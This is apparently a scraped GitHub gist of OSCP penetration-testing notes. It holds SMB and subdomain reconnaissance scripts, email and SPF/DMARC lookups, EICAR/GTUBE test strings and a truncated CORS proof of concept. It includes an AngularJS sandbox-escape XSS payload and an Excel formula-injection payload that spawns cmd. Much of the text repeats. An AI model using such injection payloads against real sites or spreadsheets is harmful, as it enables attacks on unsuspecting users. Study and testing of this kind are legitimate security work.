Petr Pospíšil SleepyLctl

## smb_ver.sh
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""

## AngularJS SandBox Escapes
https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs

List of Sandbox bypasses

1.0.1 - 1.1.5

Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

## enumeration.md

      
              8 files
            
          
              1 fork
            
          
              0 comments
            
          
              0 stars
            
          
                SleepyLctl
                / enumeration.md
            
            
              Last active
              March 5, 2019 12:03
            
              
                OSCP Get your shit ready...
              
          
https://github.com/jobertabma/recon.sh
https://github.com/codingo/Reconnoitre
https://github.com/portcullislabs/enum4linux
https://github.com/rebootuser/LinEnum
https://github.com/superkojiman/onetwopunch


## subdomains.sh
#!/bin/bash

dot="."
while read subdomain; do
        host $subdomain$dot$1 | grep "has address"
done < $2

## Email Infrastructure
MUA – Mail User Agent e.g. Outlook, Mozilla Thunderbird; Downloads emails from MDA via POP3/IMAP; Sends emails via tcp:587;
MTA – Mail Transfer Agent e.g. Kaspersky Secure Mail Gateway - SMTP server - listens tcp:25 and comunnicates with another MTA; placed in DMZ;
MDA – Mail Delivery Agent e.g. MS Exchange, IceWarp - POP3/IMAP server (local delivery server) - communicates with MTA via tcp:25; stores/forwards emails;

Email NetFlow
################

MUA -> MDA(tcp:587) -> MTA(tcp:25) -> INTERNET -> MTA(tcp:25) ->  MTA(tcp:25) -> MUA(tcp:110/143)

## smtp_flags.txt
################################################ Automatic Checks
$ https://mxtoolbox.com/SuperTool.aspx

################################################ SPF Dig Lookup
$ dig domain.com txt

################################################ DMARC Dig Lookup
$ dig _dmarc.example.org txt

################################################ DKIM Dig Lookup - selector must be known - found in email header - DKIM-Signature

## test.txt
EICAR Test String

(anti-virus)  X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
When an anti-virus program scans this file, it reports that it finds the EICAR-STANDARD-AV-TEST-FILE virus.

GTUBE Test String

(spam)  XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X
For further information, see: http://spamassassin.apache.org/gtube/.

## lol.ps1
century.underthewire.tech:6009

1. Version of Powershell Build = 10.0.14409.1012
$PSVersionTable

2. Download a file = invoke-webrequest80
Invoke-WebRequest

3. Number of files on the desktop.
Get-ChildItem ..\desktop\ | Measure-Object

## CORS_poc.html
<!DOCTYPE html>
<html>
   <head>
      <script>
         function hack()
         {
         var xmlhttp;
         if (window.XMLHttpRequest)
         {
         xmlhttp=new XMLHttpRequest();

## Excel Injections
Excel Formula Injection

@SUM(1+1)*cmd|' /C calc'!A0
	if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
	if [ ! -z $2 ]; then rport=$2; else rport=139; fi
	tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null \| grep -i "samba\\|s.a.m" \| tr -d '.' \| grep -oP 'UnixSamba.*[0-9a-z]' \| tr -d '\n' & echo -n "$rhost: " &
	echo "exit" \| smbclient -L $rhost 1>/dev/null 2>/dev/null
	sleep 0.5 && echo ""
	https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs

	List of Sandbox bypasses

	1.0.1 - 1.1.5

	Mario Heiderich (Cure53)
	{{constructor.constructor('alert(1)')()}}

	1.2.0 - 1.2.1
	#!/bin/bash

	dot="."
	while read subdomain; do
	host $subdomain$dot$1 \| grep "has address"
	done < $2
	MUA – Mail User Agent e.g. Outlook, Mozilla Thunderbird; Downloads emails from MDA via POP3/IMAP; Sends emails via tcp:587;
	MTA – Mail Transfer Agent e.g. Kaspersky Secure Mail Gateway - SMTP server - listens tcp:25 and comunnicates with another MTA; placed in DMZ;
	MDA – Mail Delivery Agent e.g. MS Exchange, IceWarp - POP3/IMAP server (local delivery server) - communicates with MTA via tcp:25; stores/forwards emails;

	Email NetFlow
	################

	MUA -> MDA(tcp:587) -> MTA(tcp:25) -> INTERNET -> MTA(tcp:25) -> MTA(tcp:25) -> MUA(tcp:110/143)
	################################################ Automatic Checks
	$ https://mxtoolbox.com/SuperTool.aspx

	################################################ SPF Dig Lookup
	$ dig domain.com txt

	################################################ DMARC Dig Lookup
	$ dig _dmarc.example.org txt

	################################################ DKIM Dig Lookup - selector must be known - found in email header - DKIM-Signature
	EICAR Test String

	(anti-virus) X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
	When an anti-virus program scans this file, it reports that it finds the EICAR-STANDARD-AV-TEST-FILE virus.

	GTUBE Test String

	(spam) XJSC4JDBQADN1.NSBN32IDNENGTUBE-STANDARD-ANTI-UBE-TEST-EMAILC.34X
	For further information, see: http://spamassassin.apache.org/gtube/.
	century.underthewire.tech:6009

	1. Version of Powershell Build = 10.0.14409.1012
	$PSVersionTable

	2. Download a file = invoke-webrequest80
	Invoke-WebRequest

	3. Number of files on the desktop.
	Get-ChildItem ..\desktop\ \| Measure-Object
	<!DOCTYPE html>
	<html>
	<head>
	<script>
	function hack()
	{
	var xmlhttp;
	if (window.XMLHttpRequest)
	{
	xmlhttp=new XMLHttpRequest();